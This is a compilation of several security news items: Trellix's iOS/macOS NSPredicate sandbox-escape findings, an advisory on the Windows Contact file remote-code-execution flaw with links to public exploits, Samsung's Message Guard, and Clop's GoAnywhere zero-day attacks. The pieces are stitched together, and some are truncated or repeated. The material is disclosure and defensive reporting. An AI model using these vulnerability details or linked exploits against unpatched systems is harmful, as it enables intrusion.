Analysis of ForcedEntry showed it involved two key parts. The first tricked an iPhone into opening a malicious PDF that was disguised as a GIF. The second part allowed attackers to escape Apple’s sandbox, which keeps apps from accessing data stored by other apps and from accessing other parts of the device. Trellix’s research, by senior vulnerability researcher Austin Emmitt, focuses on that second part and ultimately used the flaws he found to bypass the sandbox.

Specifically, Emmitt found a class of vulnerabilities that revolve around NSPredicate, a tool that can filter code within Apple’s systems. NSPredicate was first abused in ForcedEntry, and as a result of that research in 2021, Apple introduced new ways to stop the abuse. However, those don’t appear to have been enough. “We discovered that these new mitigations could be bypassed,” Trellix says in a blog post outlining the details of its research.

McKee explains that the bugs within this new NSPredicate class existed in multiple places across macOS and iOS, including within Springboard, the app that manages the iPhone’s home screen and can access location data, photos, and the camera. Once the bugs are exploited, the attacker can access areas that are meant to be closed off. A proof-of-concept video published by Trellix shows how the vulnerabilities can be exploited. 

The new class of bugs “brings a lens to an area that people haven’t been researching before because they didn’t know it existed,” McKee says. “Especially with that backdrop of ForcedEntry because somebody at that sophistication level already was leveraging a bug in this class.”

Crucially, any attacker trying to exploit these bugs would require an initial foothold into someone’s device. They would need to have found a way in before being able to abuse the NSPredicate system. (The existence of a vulnerability doesn’t mean that it has been exploited.)

Apple patched the NSPredicate vulnerabilities Trellix found in its macOS 13.2 and iOS 16.3 software updates, which were released in January. Apple has also issued CVEs for the vulnerabilities that were discovered: CVE-2023-23530 and CVE-2023-23531. Since Apple addressed these vulnerabilities, it has also released newer versions of macOS and iOS. These included security fixes for a bug that was being exploited on people’s devices. Make sure you update your iPhone, iPad, and Mac each time a new version of the operating system becomes available.

A New Kind of Bug Spells Trouble for iOS and macOS Security

This advisory ties together older research on a contact file handling flaw on Microsoft Windows as well as recent research discovered that uses the same methodologies.

[-] Microsoft Windows Contact file / Remote Code Execution (Resurrected 2022)  / CVE-2022-44666

[+] John Page (aka hyp3rlinx)  
[+] twitter.com/hyp3rlinx  
[+] ISR: ApparitionSec

Back in 2018 I discovered three related Windows remote code execution vulnerabilities affecting both VCF and Contact files.  
They were purchased by Trend Micro Zero Day Initiative (@thezdi) from me and received candidate identifiers ZDI-CAN-6920 and ZDI-CAN-7591.  
Microsoft as usual denied a fix and it was subsequently dropped as a zero day on January 10, 2019 in coordination with the ZDI program.

Almost five years passed, until researcher j00sean resurrected the flaws to add additional protocol vectors LDAP etc.  
Microsoft finally decided to patch and assign CVE-2022-44666 even though the vulnerabilities are exactly the same.

Old 2019 advisories:  
=====================  
1) Windows VCF RCE  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-FILE-INSUFFICIENT-WARNING-REMOTE-CODE-EXECUTION.txt

2) Windows Contact HTML injection  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-HTML-INJECTION-MAILTO-LINK-ARBITRARY-CODE-EXECUTION.txt

3) Windows Contact RCE  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt

Circa 2022 updated:  
=====================  
https://github.com/j00sean/CVE-2022-44666#readme  
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-44666

Additional References:  
=======================  
https://www.zerodayinitiative.com/advisories/ZDI-19-013/  
https://www.zdnet.com/article/poc-for-windows-vcf-zero-day-published-online/  
https://thehackernews.com/2019/01/vcard-windows-hacking.html  
https://twitter.com/hyp3rlinx/status/1083528552253919232  
https://seclists.org/bugtraq/2019/Jan/43  
https://vimeo.com/312824315  
https://www.exploit-db.com/exploits/46167  
https://www.rapid7.com/db/modules/exploit/windows/fileformat/microsoft_windows_contact/

Special thanks to j00sean for his work and resurrecting this vulnerability from the dead and helping deal with M$

hyp3rlinx

Microsoft Windows Contact File Remote Code Execution

Samsung has announced a new feature called Message Guard that comes with safeguards to protect users from malware and spyware via what's referred to as zero-click attacks.
The South Korean chaebol said the solution "preemptively" secures users' devices by "limiting exposure to invisible threats disguised as image attachments."
The security feature, available on Samsung Messages and Google

Mobile Security / Zero Day

Samsung has announced a new feature called **Message Guard** that comes with safeguards to protect users from malware and spyware via what's referred to as zero-click attacks.

The South Korean chaebol said the solution "preemptively" secures users' devices by "limiting exposure to invisible threats disguised as image attachments."

The security feature, available on Samsung Messages and Google Messages, is currently limited to the Samsung Galaxy S23 series, with plans to expand it to other Galaxy smartphones and tablets later this year that are running on One UI 5.1 or higher.

Zero-click attacks are highly-targeted and sophisticated attacks that exploit previously unknown flaws (i.e., zero-days) in software to trigger execution of malicious code without requiring any user interaction.

Unlike traditional methods of remotely exploiting a device wherein threat actors rely on phishing tactics to trick a user into clicking on a malicious link or opening an rogue file, such attacks circumvent the need for social engineering entirely and provide an adversary with an entry point.

A majority of the zero-click exploits are engineered to take advantage of vulnerabilities in applications such as messaging, SMS, or email apps that receive and process untrusted data.

As a result, if there exists a security vulnerability in the manner an app interprets the incoming data, a threat actor could weaponize this shortcoming to craft a malicious image that, when sent to a target's device, automatically executes the code embedded within it.

The lack of interaction involved in zero-click attacks means there are fewer traces of any nefarious activity, making them highly-prized tools to deliver spyware capable of monitoring individuals and harvesting a wealth of sensitive information.

Samsung's Message Guard works against a number of image formats, including PNG, JPG/JPEG, GIF, ICO, WEBP, BMP, and WBMP, and essentially acts as a sandbox that's designed to quarantine images received via the app from the rest of the operating system.

"Message Guard checks the file bit by bit and processes it in a controlled environment to ensure it cannot infect the rest of your device," the company said.

The feature is also analogous to a feature in Apple's iMessage called BlastDoor that the tech giant incorporated in iOS 14 as a means to counter zero-click attacks via its messaging app.

Apple, last year, also introduced an "extreme, optional protection" setting dubbed Lockdown Mode that hardens iPhones and iPads against "extremely rare and highly sophisticated cyber attacks."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Samsung Introduces New Feature to Protect Users from Zero-Click Malware Attacks

Categories: News
Categories: Ransomware
Tags: Clop

Tags:  Clop ransomware

Tags:  ransomware

Tags:  GoAnywhere

Tags:  managed file transfer

Tags:  MFT

Tags:  Fortra

Tags:  CISA

Tags:  Known Exploited Vulnerabilities Catalog

The Clop ransomware gang has claimed responsibility for a wave of attacks that exploited a zero-day in GoAnywhere MFT admin consoles.



(Read more...)




The post GoAnywhere zero-day opened door to Clop ransomware appeared first on Malwarebytes Labs.

A semi-active ransomware group has claimed it is behind a string of attacks which have taken advantage of a zero-day vulnerability in GoAywhere MFT.

The Russian-linked Clop ransomware group says it was able to remotely attack private systems using exposed GoAnywhere MFT administration consoles accessible on the public internet. BleepingComputer reports the group claimed they gained access and stole data from the GoAnywhere servers of at least 130 organizations.

One of Clop's victims was Community Health Systems (CHS), a Fortune 500 healthcare services provider in the US. It recently filed a Form 8-K to the Securities and Exchange Commission (SEC), announcing the compromise of its system and disclosure of company data, including protected health information (PHI) and personal information (PI) of certain patients. CHS didn't disclose the specific number of affected individuals.

Since the release of the emergency patch, Fortra has revealed that attackers also breached some of its MFTaaS instances during the attack.

The Cybersecurity & Infrastructure Security Agency (CISA) recently added CVE-2023-0669 to its Known Exploited Vulnerabilities Catalog, a list of software flaws that federal organizations must patch within two weeks. It's helpful for non-federal organizations to refer to as well, in order to help prioritize their patching.

Thankfully, an emergency patch (7.1.2) has been available since last week.

As well as the patch, GoAnywhere clients are also encouraged to:

*   Rotate the master encryption key.
*   Reset credentials.
*   Review audit logs and delete suspicious admin or user accounts.
*   Contact Fortra support by going to its portal, emailing technicians at goanywhere.support@helpsystems.com, or phoning them at 402-944-4242.

**How to avoid ransomware**

*   **Block common forms of entry**. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
*   **Detect intrusions**. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption**. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware.
*   **Create offsite, offline backups**. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Write an incident response plan**. The period after a ransomware attack can be chaotic. Make a plan that outlines how you'll isolate an outbreak, communicate with stakeholders, and restore your systems.

**We don't just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Tag

#zero_day